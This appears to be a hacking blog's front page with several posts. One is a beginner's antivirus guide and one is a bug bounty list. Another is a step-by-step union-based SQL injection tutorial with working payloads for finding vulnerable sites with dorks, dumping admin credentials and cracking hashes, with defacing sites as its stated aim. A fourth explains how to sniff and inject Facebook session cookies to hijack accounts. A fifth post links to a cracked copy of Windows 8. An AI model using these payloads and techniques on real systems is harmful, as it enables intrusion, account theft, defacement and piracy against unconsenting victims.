How to protect your PC from RATs , Trojans , Keyloggers and virus

How to protect your PC from RATs , Trojans , Keyloggers and virus
Is it your PC/Computer is safe from Keyloggers , RATS , Trojans and from virus.. Now-a-days most of the PC’s are infected by the Viruses and trojans . It’s all happen due to lack of security in the system. Your computer should be protected from these Kind of Trojan horses . They corrupt your system memories and can delete all personal data from the system. Now let us know How to be protected from these all kind of Trojans. First we will understand what are they then how to be protected from them.



RATS ( Remote administrative tool ) it is kind of Trojan horse which help the attacker to control the victim PC remotely. It is one of the most dangerous trojan. It depends on the RAT features and function what it can do. Mostly RATS can capture or record the screen of the victim and even it can record the keystrokes. It is mostly used for Hacking the Remote PC. Most common rats are Dark Comet , Nuclear Rat , Poision Ivy etc..
How to Protect the PC from RATS :-
Best way to prevent the PC from RAT is to install the Best and updated Antivirus ( From my side Bit Defender 2012 ).
Don’t download anything if you don’t think that it is a useful software because mostly RATS are send through the File
Scan file/files before opening.
Always keep the antivirus Up-to-date



Trojan Horse :- They are same as RATS they give full access to the remote PC. They make their multiple copies. They can steal data. If this can installed in the remote PC. then attacker have the full access to the remote PC and steal useful information from the Victim Pc .

 You can protect your PC from trojan horse by installing the Good and updated antivirus.


Keyloggers :- It is the method of stealing the Keylogs from the victim PC by installing the Trojan in the remote PC. It is mostly used for hacking the Email accounts. Most used keyloggers are Refog Keylogger , Rin logger , Emisarry keylogger etc…
Steps to protect your PC from Keylogger :-
A good and updated Antivirus
Install the Antikeyloggers like Zemana.
Conclusion is that best way to protect is a good and best Antivirus that is Bit Defender 2012 from my side. By this You can protect your PC from Viruses , trojans and Keyloggers.
I hope that this post was helpful for You all and don’t forget to share it

Read more »

SQL Injection for NOObs

SQL Injection

Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.

Lets start.

What is SQL Injection?
is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Source

Step 1: Choose Your Target:
Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.

So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.
Dorks
Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.

I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.

After you have Googled the dorks, click on any site.

To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:

Code:
http://www.sitename.com/main.php?id=232'

If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.

Step 2: Find the Vulnerable Column
Now that we found our vulnerable site, we will need to find the vulnerable columns.

Add this to the end of the URL:

Code:
http://www.sitename.com/main.php?id=232 order by 1--

Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:

Code:
http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!)

The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.

Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5--

Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.

Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.
Step 3: Obtain Version Number and Database Name
That vulnerable column is the ONLY column that we will be editing.

Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5--

If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.

Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5--

And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.
Step 4: Obtain Table Names

We are almost done, don't give up just yet.

Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.

Edit the code as follows:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--

Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..

The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--

This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.

When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.

For this tutorial, we will be using the table name of "admin".
Step 5: View the Columns, and Find the Crucial Shit
Here comes the fun part :3

To find the column names, add this to the end of the URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--

Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
Go here and type in your table name where is says "Say Hello to My Little Friend".

In my case, this is the string that I got after I inputted "admin" to the input space:

Code:
61646d696e

Now, replace the table name with hex as so:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--

Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.

Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:

Code:
Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..

Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass) ,5 FROM database.admin--

The "0x3a" will put a colon to where the information will be separated. You should get something like this:

Code:
1:MyName:e10adc3949ba59abbe56e057f20f883e

The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij. Download Havij here.

Now as you can see. This is the login info:

Code:
Username: MyName
Pass: 123456

Now all you have to do is find the admin page, which is usually
Code:
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will find you the admin page.

Read more »

Facebook Cookie Stealing And Session Hijacking

The cookie which facebook uses to authenticate it’s users is called "Datr”, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:

{ Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; }


How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

Step 1 - First of all download wireshark from the official website and install it.

Step 2 - Next open up wireshark click on analyze and then click on interfaces.

Step 3 - Next choose the appropriate interface and click on start.

Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 - Next set the filter to http.cookie contains "datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.

Step 7 -  Next right click on it and goto Copy – Bytes – Printable Text only.

Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjectorscript. Now open up Facebook.com and make sure that you are not logged in.

Step 9 - Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.

Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.

Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.

Countermeasures

The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won’t be able to do any thing with your cookies. 

Read more »

Free Download Microsoft Windows 8

Well We all know very recently Microsoft Has released one of year’s most waited operating system that is windows 8.Previously Microsoft released its develop version for pre release test.now its released to allover the globe.

Microsoft has Officially Made Its Price tag to be $39.99 which will be valid till Jan, 2013.which is one of the cheap price if you wan buy this Microsoft product.

Microsoft is also currently running a special promotion upto 31st of January 2013, under which you can upgrade to Windows 8 Pro Edition for a very small amount. If you have purchased / are going to purchase a Personal Computer which is pre-loaded with genuine version of Windows 7 (any edition), then you are eligible to get Windows 8 Upgrade (Pro Edition) for $14.99 (US Dollar) or £14.99 (British Pounds) or €14,99 (Euros) or INR 699 (Indian Rupees).

Now I am interested in something that is known as free .yes you can get this Microsoft windows 8 from the link below.so why to wait just download it through the torrent link given below having huge seeds and enjoy your windows 8 at your pc.

Click here to download Cracked Windows 8  

Read more »

List of Bug Bounty Programs

Bug Bounty Websites for Web Application Vulnerability 

Mozilla
http://www.mozilla.org/security
http://www.mozilla.org/projects/security/security-bugs-policy.html
http://www.mozilla.org/security/announce

Google
https://www.google.com/appserve/security-bugs/new?rl=xkp7zert49a5q6owod28bhr2

Facebook
http://www.facebook.com/whitehat/bounty

Paypal
https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=security/reporting_security_issues

Etsy
http://www.etsy.com

Wordpress
http://www.whitefirdesign.com/about/wordpress-security-bug-bounty-program.html

Commonsware
http://commonsware.com/bounty.html

CCBill
http://www.ccbill.com/developers/security/vulnerability-reward-program.php
http://www.ccbill.com/developers/security/rewards.php

Vark
http://www.vark.com

Windthorstisd
http://www.windthorstisd.net/BugReport.cfm


Bug Bounty Websites for Products Vulnerability 

Mozilla
http://www.mozilla.org/security
http://www.mozilla.org/security/known-vulnerabilities/firefox.html

Google Chrome
http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program

Zero Day Initiative
http://www.zerodayinitiative.com

Barracuda
http://www.barracudalabs.com/bugbounty

Artifex Software
http://www.ghostscript.com/Bug_bounty_program.html

Hex Rays
http://www.hex-rays.com/bugbounty.shtml

Ardour
http://ardour.org/bugbounty

Piwik
http://piwik.org/security


Hall of Fame Websites(No Bounties)

Microsoft
http://technet.microsoft.com/en-us/security/ff852094.aspx
http://technet.microsoft.com/en-us/security/cc308589
http://technet.microsoft.com/en-us/security/cc308575
http://technet.microsoft.com/en-us/security/cc261624
http://www.microsoft.com/security/msrc/default.aspx

Apple
http://support.apple.com/kb/HT1318

Adobe
http://www.adobe.com/support/security/bulletins/securityacknowledgments.html
http://www.adobe.com/support/security/alertus.html

IBM
http://www-03.ibm.com/security/secure-engineering/report.html

Twitter
https://twitter.com/about/security
http://support.twitter.com/groups/33-report-abuse-or-policy-violations/topics/122-reporting-violations/articles/477159-how-to-report-xss-api-and-other-security-vulnerabilities#
https://support.twitter.com/forms

Dropbox
security@dropbox.com
https://www.dropbox.com/security
https://www.dropbox.com/special_thanks

Cisco
http://tools.cisco.com/security/center/home.x#~alerts

Moodle
http://moodle.org/security

Drupal
http://drupal.org/security-team

Oracle
http://www.oracle.com/us/support/assurance/reporting/index.html

Symantec
http://www.symantec.com/security

Ebay
http://pages.ebay.com/securitycenter/Researchers.html

Twilio
http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html

37 Signals
http://37signals.com/security-response

Salesforce
http://www.salesforce.com/company/privacy/disclosure.jsp

Reddit
http://code.reddit.com/wiki/help/whitehat

Github
http://help.github.com/responsible-disclosure/

Ifixit
http://www.ifixit.com/Info/responsible_disclosure

Constant Contact
http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp

Zeggio
http://www.zeggio.com

Simplify
http://simplify-llc.com/simplify-security.html

Team Unify
http://www.teamunify.com/__corp__/security.php

Skoodat
http://www.skoodat.com/Security

Relaso
http://relaso.com/disclosure

Moduscsr
http://www.moduscsr.com/security_statement.php

Cloudnetz
http://cloudnetz.com/Legal/vulnerability-testing-policy.html

Emptrust
http://www.emptrust.com/Security.aspx

Apriva
http://www.apriva.com/security

Amazon
http://aws.amazon.com/security/vulnerability-reporting

SqaureUp
https://squareup.com/security/levels

G-Sec
http://www.g-sec.lu/responsible.disclosure.policy.html

Xen
http://www.xen.org/projects/security_vulnerability_process.html

Read more »